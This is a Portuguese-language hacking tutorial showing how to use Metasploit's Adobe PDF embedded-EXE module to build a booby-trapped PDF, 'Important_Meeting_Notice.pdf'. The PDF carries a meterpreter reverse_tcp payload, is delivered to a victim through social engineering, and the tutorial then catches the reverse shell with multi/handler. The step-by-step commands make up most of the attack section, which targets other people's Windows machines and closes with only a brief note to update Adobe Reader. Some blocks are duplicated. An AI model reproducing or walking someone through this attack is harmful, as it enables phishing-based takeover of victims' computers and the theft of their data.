Atualmente, como muitos de nós sabemos, a maioria das pessoas optam por usar o sistema operacional Windows XP ou o famoso Windows 7 ou o novo lançado recentemente o Windows 8, então é lógico que se usam o Windows é para coisas de trabalho, estudo, lazer, etc
Também é de conhecimento que o Windows é vulnerável a qualquer ataque cibernético, seja através de exploits, vulnerabilidades, Trojans, etc, que é por isso que muitos preferem usar qualquer outro sistema que o Windows.
Mas você pode se perguntar por que o Windows é tão vulnerável? … Bem, porque nós mesmos fazemos ele vulnerável! então você vai dizer! Foda-se! O meu firewall e antivírus estão atualizado! …Pois isso não tem nada haver, porque o sistema é explorado pelas vulnerabilidades estão em seus programas que você usa diáriamente, como o Adobe PDF, Microsoft Word, Ares, Windows Media Player, Winamp, VLC ou outro qualquer, porque eles querem que as empresas atualizem seus softwares (programas que a utilizam) a cada semana? … Porque, não é porque eles gostam … é para corrigir as vulnerabilidades que ocorrem diariamente nestes programas, e assim “ajudar” para tornar o sistema um pouco “seguro”.
Neste tutorial vou mostrar como tirar proveito das vulnerabilidades que ocorrem em programas que tenham instalado no sistema operacional Windows 7 ou XP, você vai ter o controle total do sistema.
Para este caso vai usar a vulnerabilidade Adobe PDF Escape EXE Social Engineering (No JavaScript) e quase 95% de chances dos usuários do Windows ter instalado o programa Adobe Acrobat em seu computador ou notebook.
REQUERIMIENTOS:
Backtrack 5 R1 – R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP – 7 (Vítima)
Adobe Reader 9.1 (Vítima)
Metasploit Framework (Atacante)
Windows XP – 7 (Vítima)
Adobe Reader 9.1 (Vítima)
PROCEDIMIENTOS:
A primeira coisa que precisamos fazer é criar um PDF malicioso no Metasploit, o arquivo será enviado para a nossa vítima usando Engenharia Social para ser aberto e conseguir acesso ao seu sistema.
Abra o Metasploit e vamos digitar os seguintes comandos:
—————————————————————————————————
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf (Creara el archivo PDF malicioso)
set lhost 192.168.1.17 (IP del Atacante)
set lport 8080 (Puerto open de la Victima)
exploit
—————————————————————————————————
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf (Creara el archivo PDF malicioso)
set lhost 192.168.1.17 (IP del Atacante)
set lport 8080 (Puerto open de la Victima)
exploit
—————————————————————————————————
Depois de ter gerado o PDF malicioso com os comandos mencionados iremos armazenar ele na pasta /root/.msf4/local/ se você não pode ver a pasta /.msf4/ pressione Ctrl + H para visualizar a mesma.
O próximo passo é enviar o PDF malicioso gerado pra nossa vítima, seja por e-mail, link de download ou outros métodos que podemos pensar (Engenharia Social).
Se nossa vítima aceitar o arquivo, imediatamente, abrimos novamente em outro console o Metasploit para gerar a conexão que você recebe quando a vítima executar o PDF, executando os seguintes comandos:
———————————————
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.1.17
exploit
———————————————
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.1.17
exploit
———————————————
Quando a vítima executar o PDF malicioso, o Adobe Acrobat exibirá uma mensagem perguntando se você deseja executar o arquivo, conforme a imagem a seguir:
Depois que a vítima clica em ‘Abrir’ automaticamente iremos receber a conexão inversa em nosso console Metasploit, como é mostrado na imagem a seguir:
E pronto! HACKED!
CONCLUSÃO:
Tendo concluído com êxito este ataque, você pode migrar o processo explorer.exe em nossa vítima.
A versão vulnerável a este ataque é o Adobe Acrobat 9.1, então se você não quer ser a vítima do ataque, você deve atualizar para uma versão maior.
A versão vulnerável a este ataque é o Adobe Acrobat 9.1, então se você não quer ser a vítima do ataque, você deve atualizar para uma versão maior.
Comentários